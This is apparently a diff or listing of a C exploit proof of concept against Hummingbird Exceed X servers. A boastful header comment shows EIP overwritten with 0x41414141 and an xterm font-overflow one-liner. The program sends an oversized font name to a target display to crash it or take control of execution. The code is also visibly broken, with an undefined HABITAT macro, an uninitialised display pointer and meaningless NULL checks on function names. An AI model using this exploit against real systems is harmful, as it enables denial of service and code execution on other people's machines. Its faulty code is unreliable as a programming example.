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- /*
- * Crushing birds for fun and knowledge
- * ------------------------------------
- *
- * HQOTD: "How secure do you want it"
- * http://mimage.hummingbird.com/alt_content/binary/pdf/collateral/ds/exceed_ds_en.pdf
- *
- * I'll tell you: Much more please sirs.
- *
- * **************************************
- *
- * Exceed has some bugs caused by the way it handles fonts, in a local and remote
- * context.
- *
- * Debug output created by master techniques:
- * EAX = C0000000
- * EBX = 00000000
- * ECX = 40000000
- * EDX = 00000501
- * ESI = 41414141 <-------- // Here
- * EDI = 0012E138
- * EIP = 41414141 <-------- // Here
- * ESP = 0012E0C8
- * EBP = 0012E0F0
- *
- * A way to check that a server is not trying to exploit your PC could be:
- * $ xlsfonts -display exceed_server:0.0
- * ...
- * --------0------
- * --arial-bold-r---0-0-120-120-p-0-iso8859-1
- * --arial-medium-r---0-0-120-120-p-0-iso8859-1
- * ...
- *
- * A way to hide evil font would be through the use of font aliasing.
- * -the first ever font spoofing technique, lol.
- *
- * [-] We can crash a local Exceed server * 2
- * [-] We can crash a remote Exceed server * many lol
- * [-] We can crash Exceed client that uses evil X Font Server * 1
- * [-] We can write over EIP address * many lol
- *
- * Hummingbird informed 3 weeks ago, still no reply.
- *
- * **************************************
- * rwxr-xr-x xterm exploit!
- *
- * $ export DISPLAY= //Valid host
- * $ xterm -font `perl -e 'print "69r"x10101'`
- * Segmentation fault (core dumped) //lol
- * $ md5sum `which xterm`
- * 09ebe34028b779eb73d4a31e987ee9ed /usr/X11R6/bin/xterm
- *
- * Root user can now have super 0day xterm sploit that s/he can use to own local user
- * accounts!
- *
- * ** This would give root the ability to become any user on the system **
- *
- * More serious than su, it does not leave a log entry behind, real anon hacker style.
- *
- * **************************************
- *
- * This is just a little hobby that saves me going to clubs at the weekend, drinking
- * beer and mumbling to some strange lethargic woman with alchohol driven motives.
- *
- * Computer security is #1 contraceptive, coming soon to an NHS near you.
- *
- * **************************************
- *
- * DNSCon is coming up - www.dnscon.org
- *
- * **************************************
- *
- * [c0ntex@darkside exceed]$ gcc -o exceed exceed.c -lX11 -L /usr/X11R6/lib
- * [c0ntex@darkside exceed]$ ./exceed exploited:0.0
- *
- * [-] Exceed [ALL] EIP Attack - c0ntex@hushmail.com
- * [-] We are using DISPLAY variable: exploited:0.0
- * [-] Hang on to your feathers, sending some buffer
- *
- * ..
- * XIO: fatal IO error 104 (Connection reset by peer) on X server "exploited:0.0"
- * after 11 requests (9 known processed) with 0 events remaining.
- *
- * **************************************
- *
- * Rants:
- * Knowledge is freely given and should be freely shared, however making money from
- * other peoples research in any way is simply unethical. =|
- *
- * SF: Clever move making your vulnerability archive public `again`, this will draw
- * back many versed in dot slash t3qN33kZ to infect themselves with trojan opcodes.
- * *LOL*
- *
- * Regards to all, keep it real.
- *
- * **************************************
- */
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <unistd.h>
- #include <X11/Xlib.h>
- #define BIGBIRD 6001
- #define DIRTY_VAL 69
- #define MAX_BORDER_LEN 3
- #define WIN_TIMER 5
- #define WIN_TITLE "simple PoC window - lets shoot birds"
- typedef char Birds;
- int main(int argc, char *argv[])
- {
- Birds nests[BIGBIRD];
- Birds egg[2] = { 'A', '\0' };
- Birds *feathersN;
- unsigned short eggs, chicks;
- unsigned short winW, winH, feathersW, feathersH;
- unsigned long locX, locY;
- unsigned long winBDR;
- Display* feathers;
- Window wingspan;
- XFontStruct* birdcull;
- fprintf(stderr, "\n\n[-] Exceed [ALL] EIP Attack - c0ntex@hushmail.com\n");
- if(argc < 2) {
- fprintf(stderr, "[-] Please set IP/Hostname for DISPLAY pointer!\n");
- fprintf(stderr, "[-] Usage: %s <hostname/IP:feathers>\n\n", argv[0]);
- return EXIT_FAILURE;
- }
- if(setenv(HABITAT, argv[1], 1) <0) {
- perror("setenv"); return EXIT_FAILURE;
- }
- fprintf(stderr, "[-] Ok, using DISPLAY variable: %s\n", argv[1]);
- for(eggs = 0; eggs < BIGBIRD -1; eggs++)
- if(strncat(nests, egg, sizeof(BIGBIRD)-1) == NULL) {
- perror("strncat"); return EXIT_FAILURE;
- }
- if((feathers = XOpenDisplay(feathersN)) == NULL) {
- perror("XOpenDisplay"); return EXIT_FAILURE;
- }
- chicks = DefaultScreen(feathers);
- winW = ((feathersW = DisplayWidth(feathers, chicks)) /3);
- winH = ((feathersH = DisplayHeight(feathers, chicks)) /3);
- wingspan = XCreateSimpleWindow(feathers, RootWindow(feathers, chicks),
- locX, locY, winW, winH, winBDR,
- BlackPixel(feathers, chicks),
- WhitePixel(feathers, chicks));
- if(XCreateSimpleWindow == NULL) {
- perror("XCreateSimpleWindow"); return EXIT_FAILURE;
- }
- XStoreName(feathers, wingspan, WIN_TITLE);
- if(XStoreName == NULL) {
- perror("XOpenDisplay"); return EXIT_FAILURE;
- }
- XMapWindow(feathers, wingspan);
- if(XMapWindow == NULL) {
- perror("XOpenDisplay"); return EXIT_FAILURE;
- }
- fprintf(stderr, "[-] Hang on to your feathers, sending some buffer \n\n");
- if((birdcull = XLoadQueryFont(feathers, nests)) == NULL) {
- perror("XLoadQueryFont"); return EXIT_FAILURE;
- }
- XCloseDisplay(feathers);
- return EXIT_SUCCESS;
- }